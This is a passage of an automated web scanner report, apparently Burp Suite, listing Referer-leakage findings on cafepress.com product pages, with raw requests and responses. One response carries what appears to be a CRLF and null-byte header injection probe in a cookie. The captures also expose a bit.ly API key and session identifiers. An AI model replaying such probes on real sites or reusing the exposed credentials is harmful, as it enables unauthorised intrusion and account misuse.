HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 95181 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:44:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnlySet-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95181 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
4. Cross-domain Referer leakage
There are 7 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request.

If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The page was loaded from a URL containing a query string:
http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
The response contains the following links to other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content3.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://content9.cpcache.com/js/http_request.js
http://images4.cpcache.com/product/273694144v2_480x480_Back_Color-Black.jpg
http://images4.cpcache.com/product/273694144v2_480x480_Front_Color-Black.jpg
http://images4.cpcache.com/product/273694144v2_48x48_Front_Color-Black.jpg
http://images4.cpcache.com/product_zoom/273694144v2_400x400_Front_Color-Black.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; 
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... <meta property="og:site_name" content="CafePress.com" /> <link rel="stylesheet" href="http://content3.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all"> <script type="text/javascript">...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... 
<li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]... <!-- Product Image --> <img border="0" class="imageborder" name="mainimg" src="http://images4.cpcache.com/product/273694144v2_480x480_Front_Color-Black.jpg" alt="'Campers Suck' Video Game T-shirt for Men" id="productImageLarge" /> <div class="clear">...[SNIP]... <a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images4.cpcache.com/product/273694144v2_48x48_Front_Color-Black.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images4.cpcache.com/product_zoom/273694144v2_400x400_Front_Color-Black.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images4.cpcache.com/product/273694144v2_480x480_Back_Color-Black.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <!-- this one is for ajax stuff --><script type="text/javascript" src="http://content9.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... 
<!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The page was loaded from a URL containing a query string:
http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
The response contains the following links to other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/js/http_request.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 95184 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Vary: Accept-Encoding Set-Cookie: ASP.NET_SessionId=hgypw52u3gij4ovwij2xb245; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=b7228e23-2409-4402-9cd7-ee1a3db28b4f; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/ Set-Cookie: cpv=8f33e318-123c-4498-9d41-8084438c139c; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: pid.guid=6e8d3e27-a6be-4a44-b5ef-2939ef9ee677; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:48 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/ Set-Cookie: cp-v=40EF613B13210CD6C2BDE6E814B3A8DC; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:48 GMT; path=/ Set-Cookie: cppss=2x3; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95184 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 
<meta property="og:site_name" content="CafePress.com" /> <link rel="stylesheet" href="http://content0.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all"> <script type="text/javascript">...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... <li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]... <!-- Product Image --> <img border="0" class="imageborder" name="mainimg" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" alt="Eat Sleep Game T-Shirt" id="productImageLarge" /> <div class="clear">...[SNIP]... <a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... 
<!-- this one is for ajax stuff --><script type="text/javascript" src="http://content0.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The page was loaded from a URL containing a query string:
http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601
The response contains the following links to other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content2.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content5.cpcache.com/js/http_request.js
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 95181 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:44:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/ Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/ Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/ Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/ Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 95181 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 
<meta property="og:site_name" content="CafePress.com" /> <link rel="stylesheet" href="http://content2.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all"> <script type="text/javascript">...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /> </a>...[SNIP]... <li><a href="http://www.mycustomtomtom.com" target="_blank"> custom gps</a>...[SNIP]... </ul><img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/> <div class="clear">...[SNIP]... <!-- Product Image --> <img border="0" class="imageborder" name="mainimg" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" alt="Eat Sleep Game T-Shirt" id="productImageLarge" /> <div class="clear">...[SNIP]... <a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... <a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"> </a>...[SNIP]... 
<!-- this one is for ajax stuff --><script type="text/javascript" src="http://content5.cpcache.com/js/http_request.js"> </script>...[SNIP]... </div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]... </script><script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]... <!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
4.4. http://www.cafepress.com/cp/info/help/index.aspx
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /cp/info/help/index.aspx
Issue detail
The page was loaded from a URL containing a query string: http://www.cafepress.com/cp/info/help/index.aspx?page=privacy_policy.aspx
The response contains the following links to other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://www.mycustomtomtom.com/
Request
GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; 
